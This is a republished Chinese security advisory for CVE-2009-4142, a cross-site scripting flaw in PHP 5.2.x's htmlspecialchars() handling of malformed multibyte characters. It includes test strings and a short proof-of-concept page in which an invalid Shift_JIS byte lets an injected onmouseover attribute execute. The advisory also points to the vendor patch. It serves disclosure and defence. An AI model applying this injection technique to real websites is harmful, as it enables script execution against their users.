首页 | 资讯动态 | linux基础 | 系统管理 | 网络管理 | 编程开发 | linux数据库 | 服务器技术 | linux相关 | linux认证 | 嵌入式 | 下载中心 | 专题 | linux招聘 | HR | 镜像
OKLinux中文技术站
·设为首页
·加入收藏
·联系我们
系统管理: 中文环境 系统管理 桌面应用 内核技术 | Linux基础: 基础入门 安装配置 常用命令 经验技巧 软件应用 | Linux数据库: Mysql Postgre Oracle DB2 Sybase other
网络管理: 网络安全 网络应用 Linux服务器 环境配置 黑客安全 | 编程开发: PHP CC++ Python Perl Shell 嵌入式开发 java jsp | PHP技术: PHP基础 PHP技巧 PHP应用 PHP文摘
搜索中心 Linux招聘 Linux专题 Apache | Linux相关: 硬件相关 Linux解决方案 Linux认证 企业应用 其它Unix | 相关下载: 资料下载 参考手册 开发工具 服务器类 软路由 其它
 技术搜索:
会员中心 注册会员 高级搜索  
  → 当前位置:首页>网络管理>网络安全>正文

PHP htmlspecialcharacters()畸形多字节字符跨站脚本漏洞

http://www.oklinux.cn  2010-01-03  绿盟科技    会员收藏  游客收藏  【 】 
您查看的文章来源于http://www.oklinux.cn

发布日期:2009-12-17
更新日期:2009-12-18

受影响系统:
PHP PHP 5.2.x
不受影响系统:
PHP PHP 5.2.12
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 37389
CVE(CAN) ID: CVE-2009-4142

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP的htmlspecialchars()函数没有正确地过滤某些多字节字符输入,远程攻击者可以通过提交包含有特殊字符的请求序列执行跨站脚本攻击。

<*来源:Moriyoshi ([email protected]

链接:http://secunia.com/advisories/37821/
http://bugs.php.net/bug.php?id=49785
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

// overlong UTF-8 sequence
echo htmlspecialchars("A\xC0\xAF&", ENT_QUOTES, 'UTF-8');
// invalid Shift_JIS sequence
echo htmlspecialchars("B\x80&", ENT_QUOTES, 'Shift_JIS');
echo htmlspecialchars("C\x81\x7f&", ENT_QUOTES, 'Shift_JIS');
// invalid EUC-JP sequence
echo htmlspecialchars("D\x80&", ENT_QUOTES, 'EUC-JP');
echo htmlspecialchars("E\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
echo htmlspecialchars("F\x8E\xFF&", ENT_QUOTES, 'EUC-JP');
echo htmlspecialchars("G\x8F\xA1\xFF&", ENT_QUOTES, 'EUC-JP');


<?php

$_GET['a1'] = "\xf0"; // \xf0 - \xfc で可能
$_GET['a2'] = " href=../../dummy onmouseover=alert(document.title) dummy=dummy";

header( "Content-Type:text/html; charset=Shift_JIS" );
?>
<html>
<head><title>Shift_JIS test</title></head>
<body>
<p><a title="<?php echo htmlspecialchars( $_GET['a1'], ENT_QUOTES, 'SJIS' ) ?>" href=../../"<?php echo htmlspecialchars( $_GET['a2'], ENT_QUOTES, 'SJIS' ) ?>">test</a></p>
</body>
</html>

建议:
--------------------------------------------------------------------------------
厂商补丁:

PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.php.net/ChangeLog-5.php#5.2.12


上一篇:Linux Kernel drivers/firewire/ohci.c空指针引用拒绝服务漏洞   下一篇:Ubuntu 9.10环境下缓存区溢出攻击实验

收藏于收藏夹】 【评论】 【推荐】 【打印】 【关闭
相关文档
·Ubuntu 9.10环境下缓存区溢出攻击实验
·Linux Kernel drivers/firewire/ohci.c空指针引用拒绝
·Linux Kernel fuse_ioctl_copy_user()函数本地拒绝服
·Adobe Acrobat再曝0day漏洞 或导致计算机被远程控制
·Intel可信执行技术SINIT ACM本地权限提升漏洞
·phpGroupWare多个输入验证漏洞
·分析称谷歌Chrome OS 将成黑客主要攻击对象
·PostgreSQL爆漏洞 Oracle家Sun忙修补
·系统安全:Windows与Linux平台
·DeluxeBB多个远程安全漏洞
·FreePBX多个跨站脚本和HTML注入漏洞
·奥巴马任命网络安全专家担任“网络沙皇”
·Linux Kernel ext4_decode_error函数空指针引用拒绝服
·Linux Kernel ext4_fill_flex_info函数拒绝服务漏洞
·Linux Kernel Ext4子系统ioctl本地权限提升漏洞
·Novell eDirectory Post Auth头远程溢出漏洞
发表评论
密码: 匿名评论
评论内容:

(不超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规)
 
  最新文档
·FreeBSD ZIL机制不安全文件权限漏洞
·Novell eDirectory Post Auth头远程溢
·Linux Kernel Ext4子系统ioctl本地权限
·Linux Kernel ext4_fill_flex_info函数
·Linux Kernel ext4_decode_error函数空
·奥巴马任命网络安全专家担任“网络沙皇
·FreePBX多个跨站脚本和HTML注入漏洞
·DeluxeBB多个远程安全漏洞
·系统安全:Windows与Linux平台
·PostgreSQL爆漏洞 Oracle家Sun忙修补
·分析称谷歌Chrome OS 将成黑客主要攻击
·phpGroupWare多个输入验证漏洞
  阅读排行
·Ubuntu中UFW防火墙的安装及使用
·Ubuntu里安装配置防火墙
·Linux下Sniffer工具Tcpdump的安装和使
·Ubuntu下轻松安装小红伞杀毒软件
·Ubuntu防火墙 UFW 设置简介
·SUSE Linux 默认的iptables防火墙配置
·Linux下破解路由器WEP加密
·Linux系统中的Passwd文件详细解析
·CentOS Linux关闭防火墙
·Linux下安装配置NTOP监视网络使用情况[
·Linux下配置ssh无密码登录
·Linux安全之网上惊现傻瓜型病毒制作工
·配置Linux 内核并利用iptables 做端口
·Linux 安全模块(LSM)简介
·我的SUSE Linux防火墙配置笔记
网摘收藏: